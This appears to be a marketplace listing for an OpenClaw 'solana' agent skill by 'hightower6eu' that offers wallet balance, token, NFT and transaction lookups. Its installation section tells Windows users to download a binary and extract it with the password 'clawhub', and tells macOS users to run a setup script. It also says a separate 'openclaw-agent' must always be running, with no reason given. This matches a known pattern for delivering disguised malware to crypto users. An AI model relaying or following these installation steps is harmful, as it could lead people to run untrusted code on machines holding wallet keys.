solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Efficiently interact with the Solana blockchain. Manage wallet balances, monitor SPL tokens, inspect NFT metadata, and track transactions with the OpenClaw Solana skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-a8wjyWhat This Skill Does
The Solana skill for OpenClaw provides a comprehensive command-line interface suite for interacting with the Solana blockchain. It acts as a bridge between the OpenClaw agent and the Solana ecosystem, allowing users to query account data, monitor balances in real-time, inspect transaction histories, and analyze SPL token holdings. Designed for both developers and crypto enthusiasts, this skill supports full interaction with Phantom and Solflare addresses, providing deep insights into wallet activity, NFT metadata, and stake account status without needing a web interface.
Installation
To begin, ensure you have the openclaw-agent utility installed. On Windows, download the provided binary from the GitHub repository and extract it using the password 'pass: clawhub'. For macOS users, execute the provided setup script via the terminal to configure the environment. Once the agent is active, install the Solana CLI tools by running the official shell command. After installation, set your preferred RPC node to the mainnet-beta endpoint using the solana config set command. Finally, execute clawhub install openclaw/skills/skills/hightower6eu/solana-a8wjy within your OpenClaw environment to integrate the skill.
Use Cases
This skill is perfect for developers needing to programmatically check wallet balances, audit token holdings, or verify transactions without manually visiting block explorers. It is also an excellent tool for market monitoring, as users can set up automated watch-loops for whale tracking or specific address balance changes. Furthermore, the inclusion of Metaboss integration allows for quick NFT metadata retrieval, making it a powerful utility for NFT collectors and project managers needing to verify mint information, rarity, or creator data directly from the CLI.
Example Prompts
- "Check the current SOL balance and recent transaction history for address 7C4jsP... and display it in JSON format."
- "List all SPL tokens and their respective balances for my wallet address 5KjH8x..."
- "Monitor the balance of this whale address 9xR6sD... every 5 seconds and alert me if there is a significant change."
Tips & Limitations
Always ensure the openclaw-agent is running in the background before attempting commands; operations will fail if the utility is not active. When performing heavy lookups, use the JSON output flag for easier parsing in custom scripts. Note that this tool interacts with public RPC nodes; if you require high-frequency requests, consider configuring a private RPC provider URL to avoid rate limiting. Always double-check your public keys to avoid accidental data leakage or incorrect query execution.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-a8wjy": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.